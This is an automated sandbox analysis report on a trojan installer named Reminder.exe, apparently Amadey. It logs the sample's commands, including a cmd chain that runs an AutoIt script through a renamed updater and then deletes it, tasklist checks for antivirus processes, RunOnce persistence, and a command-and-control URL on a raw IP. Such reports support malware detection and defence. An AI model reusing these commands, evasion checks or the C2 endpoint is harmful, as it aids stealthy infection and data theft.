      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpWindow found: window name: TMainForm
      Source: Reminder.exeStatic file information: File size 10161880 > 1048576
      Source: Reminder.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Reminder.exeStatic PE information: real checksum: 0x9b2654 should be: 0x9bc79f
      Source: Reminder.exeStatic PE information: section name: .didata
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\Desktop\Reminder.exeFile created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\coigned\is-9F4FN.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
      Source: C:\Users\user\Desktop\Reminder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Reminder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 180000
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep count: 102 > 30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -3060000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6512Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep count: 191 > 30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -5730000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 180000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess information queried: ProcessInformation

      Anti Debugging

      barindex
      Source: C:\Windows\System32\tasklist.exeSystem information queried: CodeIntegrityInformation
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeMemory protected: page readonly | page read and write | page write copy | page execute | page execute and read and write | page guard
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000029.00000002.2093368871.0000000003E62000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000002A.00000002.2510265571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      Registry Run Keys / Startup Folder
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote ServicesData from Local System1
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      1
      Disable or Modify Tools
      LSASS Memory2
      Process Discovery
      Remote Desktop ProtocolData from Removable Media1
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      121
      Virtualization/Sandbox Evasion
      Security Account Manager121
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS2
      System Owner/User Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      Remote System Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
      System Information Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Reminder.exe54%ReversingLabsWin32.Trojan.Amadey
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\coigned\Updater.exe (copy)0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://152.89.198.124/8bdDsv3dk2FF/index.phptrue
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        152.89.198.124
        unknownUnited Kingdom
        209003NEXTVISIONGBtrue
        IP
        127.0.0.1
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1540342
        Start date and time:2024-10-23 17:02:52 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsinteractivecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:44
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • EGA enabled
        Analysis Mode:stream
        Analysis stop reason:Timeout
        Sample name:Reminder.exe
        Detection:MAL
        Classification:mal84.troj.spyw.evad.winEXE@60/7@0/11
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: Reminder.exe
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):29472
        Entropy (8bit):7.042110181107409
        Encrypted:false
        SSDEEP:
        MD5:077CB4461A2767383B317EB0C50F5F13
        SHA1:584E64F1D162398B7F377CE55A6B5740379C4282
        SHA-256:8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
        SHA-512:B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
        Malicious:false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:PE32+ executable (console) x86-64, for MS Windows
        Category:dropped
        Size (bytes):6144
        Entropy (8bit):4.720366600008286
        Encrypted:false
        SSDEEP:
        MD5:E4211D6D009757C078A9FAC7FF4F03D4
        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
        Malicious:false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\Desktop\Reminder.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):3325440
        Entropy (8bit):6.597962076419531
        Encrypted:false
        SSDEEP:
        MD5:4BFB5A37DC6ACBC273CEB792408BFEC9
        SHA1:51C820B195E7E9069D5BE0CAE12A0D566BA358A2
        SHA-256:E35B01344C6ABD6463439DC23A450C3ED5FA656778647CBEA070E1F6A4A9C906
        SHA-512:01C87EC83C258657B663A90819534546A847DC30903C9AF79F45048CD11C598660CF253F23575FE7B471B7DE07BDA902D7E1526D21EF8785B2F80C14B83FD5D3
        Malicious:false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@...........................3...........@......@...................P,.n.....,.j:...P0..8....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc....8...P0..:..../.............@..@.............04......`3.............@..@................
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:3F58A517F1F4796225137E7659AD2ADB
        SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
        SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
        SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
        Malicious:false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:data
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:70AE9B8A733EAA5A6AC51F701F86F73D
        SHA1:13154932B86947EFCDDD92F552E15AEC5316B2CE
        SHA-256:151EC6640A046099F9FF5CC3A19001ACBC2D1C4CC8BD8C8BB43BA598CCAC6681
        SHA-512:4AED1C6EA245AD4DFAA90253DCFC1D8FB2AD965C241F91D84FBC315D994B73BFC7F225E30E4019887B116D57A17330A1C1E994E5E6332AE66A68A3AD8BDB33B6
        Malicious:false
        Reputation:unknown
        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o..K.,.qn...D..............#.....J.#.....JkC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~...bk..)....Vq.#..c9|J.#....Jm.....T,....5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:data
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:356418D32F4117C84B577BE53DC1BBF2
        SHA1:D09CF166E6D90A9B5BFB74B8297833A5E69E00F6
        SHA-256:0D8586DA0418EAD69F96ECC3A19BF61AF9A6F8BCC42602E0D6F00F80C5E6CAA1
        SHA-512:1EE6F6315C8F0E9EB2E93BDCB14661F506279285148396D2A863073B796EE2A99B5F74C9A0329FE35B6B72C624F80FACCA630ED63BAEB77BA94EAE93B12E3A40
        Malicious:false
        Reputation:unknown
        Preview:B;k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B;k.....................................
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):943784
        Entropy (8bit):6.621472142472864
        Encrypted:false
        SSDEEP:
        MD5:3F58A517F1F4796225137E7659AD2ADB
        SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
        SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
        SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
        Malicious:false
        Reputation:unknown
        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:data
        Category:dropped
        Size (bytes):61106
        Entropy (8bit):7.997065387988865
        Encrypted:true
        SSDEEP:
        MD5:70AE9B8A733EAA5A6AC51F701F86F73D
        SHA1:13154932B86947EFCDDD92F552E15AEC5316B2CE
        SHA-256:151EC6640A046099F9FF5CC3A19001ACBC2D1C4CC8BD8C8BB43BA598CCAC6681
        SHA-512:4AED1C6EA245AD4DFAA90253DCFC1D8FB2AD965C241F91D84FBC315D994B73BFC7F225E30E4019887B116D57A17330A1C1E994E5E6332AE66A68A3AD8BDB33B6
        Malicious:false
        Reputation:unknown
        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o..K.,.qn...D..............#.....J.#.....JkC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~...bk..)....Vq.#..c9|J.#....Jm.....T,....5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.
        Process:C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type:data
        Category:dropped
        Size (bytes):737665
        Entropy (8bit):6.4607709946359995
        Encrypted:false
        SSDEEP:
        MD5:356418D32F4117C84B577BE53DC1BBF2
        SHA1:D09CF166E6D90A9B5BFB74B8297833A5E69E00F6
        SHA-256:0D8586DA0418EAD69F96ECC3A19BF61AF9A6F8BCC42602E0D6F00F80C5E6CAA1
        SHA-512:1EE6F6315C8F0E9EB2E93BDCB14661F506279285148396D2A863073B796EE2A99B5F74C9A0329FE35B6B72C624F80FACCA630ED63BAEB77BA94EAE93B12E3A40
        Malicious:false
        Reputation:unknown
        Preview:B;k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B;k.....................................
        Process:C:\Windows\SysWOW64\PING.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):478
